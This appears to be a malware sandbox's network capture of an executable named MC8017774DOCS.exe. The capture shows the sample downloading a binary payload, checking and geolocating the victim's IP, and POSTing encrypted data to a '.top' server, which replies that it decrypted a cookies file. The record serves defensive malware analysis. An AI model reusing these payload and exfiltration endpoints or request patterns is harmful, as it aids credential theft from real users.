Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 07:09:49.646096945 CET | 192.168.2.6 | 1.1.1.1 | 0x76c5 | Standard query (0) | mertvinc.com.tr | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:52.815150976 CET | 192.168.2.6 | 1.1.1.1 | 0x5741 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:55.387236118 CET | 192.168.2.6 | 1.1.1.1 | 0xad84 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:10:28.475227118 CET | 192.168.2.6 | 1.1.1.1 | 0x2501 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:10:37.034605026 CET | 192.168.2.6 | 1.1.1.1 | 0xb3f7 | Standard query (0) | the.drillmmcsnk.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 07:09:49.922653913 CET | 1.1.1.1 | 192.168.2.6 | 0x76c5 | No error (0) | mertvinc.com.tr | | 185.244.144.68 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:52.952358007 CET | 1.1.1.1 | 192.168.2.6 | 0x5741 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 07:09:52.952358007 CET | 1.1.1.1 | 192.168.2.6 | 0x5741 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:52.952358007 CET | 1.1.1.1 | 192.168.2.6 | 0x5741 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:52.952358007 CET | 1.1.1.1 | 192.168.2.6 | 0x5741 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:52.952358007 CET | 1.1.1.1 | 192.168.2.6 | 0x5741 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:52.952358007 CET | 1.1.1.1 | 192.168.2.6 | 0x5741 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:55.524797916 CET | 1.1.1.1 | 192.168.2.6 | 0xad84 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:09:55.524797916 CET | 1.1.1.1 | 192.168.2.6 | 0xad84 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:10:28.612538099 CET | 1.1.1.1 | 192.168.2.6 | 0x2501 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 07:10:37.617105961 CET | 1.1.1.1 | 192.168.2.6 | 0xb3f7 | No error (0) | the.drillmmcsnk.top | | 5.182.211.149 | A (IP address) | IN (0x0001) | false
                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                  • api.telegram.org
                                                                                                                                                  • mertvinc.com.tr
                                                                                                                                                  • checkip.dyndns.org
                                                                                                                                                  • the.drillmmcsnk.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49801 | 185.244.144.68 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:09:50.048825026 CET | 183 | OUT | GET /pqvBgXvmocLIihvW108.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: mertvinc.com.tr
Cache-Control: no-cache
Nov 25, 2024 07:09:51.498241901 CET | 299 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/octet-stream
Last-Modified: Mon, 18 Nov 2024 08:52:07 GMT
Etag: "32c40-673b0037-3f132ea2915fd050;;;"
Accept-Ranges: bytes
Content-Length: 207936
Date: Mon, 25 Nov 2024 05:16:15 GMT
Server: LiteSpeed
X-Powered-By: PleskLin
Nov 25, 2024 07:09:51.498260021 CET | 1236 | IN | Data Raw: 46 62 0e 91 09 b9 db 6a 92 8a 1a 83 48 ab 9b 89 9f de e0 f4 c7 b0 1b 8b ef 03 28 a6 ff 5d 8d 36 d9 1d 77 da a9 b0 c0 a8 02 7b 18 74 ec aa 83 85 71 6e 3e cd f2 f4 1c c9 ce de 49 88 a2 cd 91 37 a5 cf 34 a3 b1 40 60 24 84 57 98 a8 47 e7 e0 c2 95 dd
Data Ascii: FbjH(]6w{tqn>I74@`$WGf`F?hDbcBLfP@Ks-glQ)Lhcr~wAch&GZC-?c1gkXDlW>rY?qJ$W+7'G&
Nov 25, 2024 07:09:51.498272896 CET | 1236 | IN | Data Raw: e4 81 0c 51 12 ff 46 32 2e 7d d8 11 45 f3 56 85 ea 70 72 40 dc e4 48 57 c9 44 aa 72 ae 67 13 38 61 c7 5a 82 b6 d3 a5 ff 98 5f d4 c0 fe 8d 52 ae 34 2d 07 b4 6d c4 93 75 13 fb c4 5f 84 45 a7 1e c0 fe c5 a0 3a 32 93 a0 68 f0 53 29 d6 5b 44 23 3d aa
Data Ascii: QF2.}EVpr@HWDrg8aZ_R4-mu_E:2hS)[D#=XFqPhMK<H`N{j&B/Jcu*>$|#~kFYXtv+qxk~CfP35IcBNH]ZYwm~&
Nov 25, 2024 07:09:51.500376940 CET | 328 | IN | Data Raw: 8f 33 5a 71 75 83 5c be 17 66 45 d9 95 70 5f f0 e9 53 95 33 d1 17 e3 3a 00 c2 56 32 83 4c 69 dc c5 2c fe 3d b8 1c 67 8a 73 a7 09 e4 80 4d a9 ae 88 27 03 9c 8b c2 5c af 2e 21 1f 7c 7b 8b 47 17 c8 09 fd e4 6f c0 08 50 d8 dc 54 ce 44 29 54 ad f8 68
Data Ascii: 3Zqu\fEp_S3:V2Li,=gsM'\.!|{GoPTD)Th*Qp?UPR|'Zm!q*YX%.btjmj^"}Fctq77Q<}z/JdqY{/;D -vuEdw3"z{SkDf
Nov 25, 2024 07:09:51.603843927 CET | 1236 | IN | Data Raw: 7b fe 37 63 76 02 15 ee df 4c 06 d3 15 65 24 64 31 50 e4 4b 2c d7 81 55 83 91 bd 48 a7 9f 44 a0 c6 e1 4d a1 e0 cb f5 ea 7a 85 cc ab 71 15 20 55 e6 5c 3f 30 5e a0 fa e0 9c d4 ce 07 d0 85 5f d9 06 8d ee 8f 25 2b bc 80 67 72 97 62 23 2f e5 21 6b 93
Data Ascii: {7cvLe$d1PK,UHDMzq U\?0^_%+grb#/!k|T0B]?<>]TP>{}6y=lIm99nvO~rE^I,*fcY18L[G1Ve/\&P_{'N+Rn$
Nov 25, 2024 07:09:51.603879929 CET | 1236 | IN | Data Raw: c5 7f 2a 56 77 6a af 5c dd 11 7e 03 b5 9b d7 13 ef 64 14 be 46 a2 80 50 d0 bb 4d 07 29 c2 a9 c1 96 cf fd 44 16 50 8a 73 db e2 e4 44 0d 05 9f 1a 29 8d d3 e8 ae 7a ce a1 30 9e 51 9a ab 10 6a 5e f3 52 ea 28 0c e5 68 0c e4 6b de 2a 1b ec 56 1f 2f 1b
Data Ascii: *Vwj\~dFPM)DPsD)z0Qj^R(hk*V/gyR9B%li68>:Kp38W#WE>Dpq6yrk)l`&fwAK(&>V@jV`Zu$X<v-P?`Fvs|Tj44J
Nov 25, 2024 07:09:51.617614031 CET | 1236 | IN | Data Raw: 87 f7 c7 a6 60 a4 11 e3 6e fc 3c a7 cd eb 99 42 b7 1f a6 90 62 86 8d f9 93 38 e6 05 ae 5b 60 5b dd a4 8f ab 2f bf cb ad 66 8e dd 64 fa aa 40 ab a0 14 64 b4 33 23 37 8e 7d 1f 05 28 75 76 44 30 8f 4c 10 a2 68 c3 ee 82 86 ee 62 07 31 23 d0 94 ec 3b
Data Ascii: `n<Bb8[`[/fd@d3#7}(uvD0Lhb1#;d"E]=iUOr=&*G)_{5&oTv%qS!.9ms9C\=UCNz4MUmp/P-g28MSN\
Nov 25, 2024 07:09:51.617628098 CET | 492 | IN | Data Raw: 40 b7 55 75 ab a0 2b 52 c9 c6 04 1c b7 30 3e fd 22 11 be b6 bf 7b d4 12 fa b7 48 cc e7 bf 56 52 ba 57 3c 74 06 89 e7 b4 74 a2 ae 00 eb 87 bb 1d 93 ee f6 39 fb 3a 9f 0c 9f 41 82 4b 9a 06 7b 83 25 24 6b 90 c4 7b ac 61 e5 c2 03 e8 62 f6 94 21 be 75
Data Ascii: @Uu+R0>"{HVRW<tt9:AK{%$k{ab!u["[~2H0!,n@v;nQ=5(Z%-Dv5DcmzG(PB(t+j&$!,**VK=P&-SRC("^m,}>
Nov 25, 2024 07:09:51.619843960 CET | 1236 | IN | Data Raw: 44 32 1b 9d d8 86 2d 2d a4 e5 2f e3 9d 9b ec 4a 7f ab 44 5c 1c 97 5d d6 8a 65 9c 27 81 76 39 c9 a1 e1 c8 97 e8 34 1b 6f 7d cb 9d 92 4f 81 cb 93 3a 27 9a 7e d2 29 a7 e4 06 cc 4d d1 4a be ee 33 4a 33 0c 85 27 98 c2 14 d8 74 6c 4a fe 3a 7c 0f 6c 46
Data Ascii: D2--/JD\]e'v94o}O:'~)MJ3J3'tlJ:|lF0s8UZq>i'nLxpl]*&!\KQKqN}.g\s8#$P]2R[6h>y1 HwK+t
Nov 25, 2024 07:09:51.723620892 CET | 1236 | IN | Data Raw: 5d 68 0f b8 c7 e9 72 04 aa df 16 57 a7 68 21 e7 e3 e4 6b 5c 41 58 15 be 3d 2c 21 aa 1d 0d 8f 2f a3 c9 f6 a8 dd 2f fa 0a fb 26 8f 8b c8 73 a1 b6 0e 76 82 76 f3 de 7f 68 31 c5 32 e7 d5 e5 d0 a0 95 14 c4 f4 8e 09 a7 30 ab 8d 15 ff da cc da a5 04 a7
Data Ascii: ]hrWh!k\AX=,!//&svvh120k|,]n17_nC:rdOGE|yWva{-M^eYY]cvFFOi2E\@`(b!)%\`uf]7nV?Ah<%we@U|7!x/e52f7{
Nov 25, 2024 07:09:51.724009037 CET | 1236 | IN | Data Raw: 63 8b 61 cd 5a 46 2e ad 3a 4b 0e 4c 66 db 06 e3 c8 1d 71 a5 a9 3e c3 6c 51 a4 55 f7 be 62 c1 b3 aa ad c5 54 98 66 3e 23 e0 0b 02 74 98 85 d7 b5 a1 a6 52 e1 08 b8 75 3f fa 56 0f 52 e6 ff 72 6e 1d 0a bf f3 10 c2 ad ae e2 b4 1f 84 d0 cf ea 56 10 7e
Data Ascii: caZF.:KLfq>lQUbTf>#tRu?VRrnV~87(lG.b54"O}.Z,[c440[N([-qu*V2o?^T#)1C5=5u*>)HvD-e\BUa.S8|f$`KX"fHz8F52b


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49808 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:09:53.078775883 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:09:54.536580086 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:09:54 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 07:09:54.549007893 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 25, 2024 07:09:55.056010008 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:09:54 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 07:09:57.234265089 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 25, 2024 07:09:57.739171028 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:09:57 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49826 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:09:59.650675058 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 25, 2024 07:10:04.754462004 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:04 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49846 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:06.728753090 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:10:09.312534094 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:09 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49858 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:11.210953951 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:10:12.638983011 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:12 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49866 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:14.426227093 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:10:16.424850941 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:15 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 07:10:16.425348997 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:15 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49877 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:18.221563101 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:10:19.680177927 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:19 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49885 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:21.579725981 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:10:22.979583025 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:22 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49896 | 132.226.8.169 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:24.847112894 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 25, 2024 07:10:26.655838966 CET | 272 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:26 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49928 | 5.182.211.149 | 80 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 07:10:37.774224997 CET | 143 | OUT | POST /den/P4.php HTTP/1.1
Content-Type: text/plain; charset=utf-8
Host: the.drillmmcsnk.top
Content-Length: 1432
Connection: Keep-Alive
Nov 25, 2024 07:10:37.779309988 CET | 1432 | OUT | Data Raw: 4c 50 54 35 65 67 76 50 32 30 58 73 76 65 42 63 51 49 76 45 44 6f 66 66 44 31 77 58 78 37 2b 5a 4f 51 4c 30 58 42 59 65 42 6d 76 4b 47 6c 32 45 55 39 35 72 6c 57 2b 63 38 4c 6c 71 2b 58 59 51 44 6c 61 34 69 46 78 78 59 45 70 43 47 74 70 4b 56 4a
Data Ascii: LPT5egvP20XsveBcQIvEDoffD1wXx7+ZOQL0XBYeBmvKGl2EU95rlW+c8Llq+XYQDla4iFxxYEpCGtpKVJaD2Hr9cdcOiNIulsEGWctGEvQb/cWLZRcIfOr1k7qXOLrQ7/PpC438ZgmIWT0WAQc0Guaq0BQ2kDkmZURg3odpDNOx9A9XSzfhRvm9mWJ1c/nm0RFppwfJoh3icT/7K9X3HBAtdfsC+meA1UEI+9ly/nNi/7cn/ys
Nov 25, 2024 07:10:39.098196983 CET | 250 | IN | HTTP/1.1 201 Created
content-type: text/html; charset=UTF-8
content-length: 86
date: Mon, 25 Nov 2024 06:10:38 GMT
server: LiteSpeed
connection: Keep-Alive
Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 64 65 63 72 79 70 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 31 36 36 37 2e 74 78 74 22 7d
Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_1667.txt"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49815 | 172.67.177.134 | 443 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:09:56 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-25 06:09:57 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:09:57 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 478906
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sre3Zfq0oUrHdGe4bkDLPNWSAUTYas5r5jXHMT8hLXao9%2BzGQWb9F8m2Mfjgg4cXSrIeQhE3V%2BlBWwGFyR37csH7HNLrLH9UgwGgIlatVjHkyPIZaQ%2Fx7SrChTzfuRpgiFop8fJl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e7f790b7eba0caa-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1645997&cwnd=238&unsent_bytes=0&cid=a8d4bf7599bffa27&ts=460&x=0"
2024-11-25 06:09:57 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49821 | Destination IP: 172.67.177.134 | Destination Port: 443 | PID: 4488 | Process: C:\Users\user\Desktop\MC8017774DOCS.exe
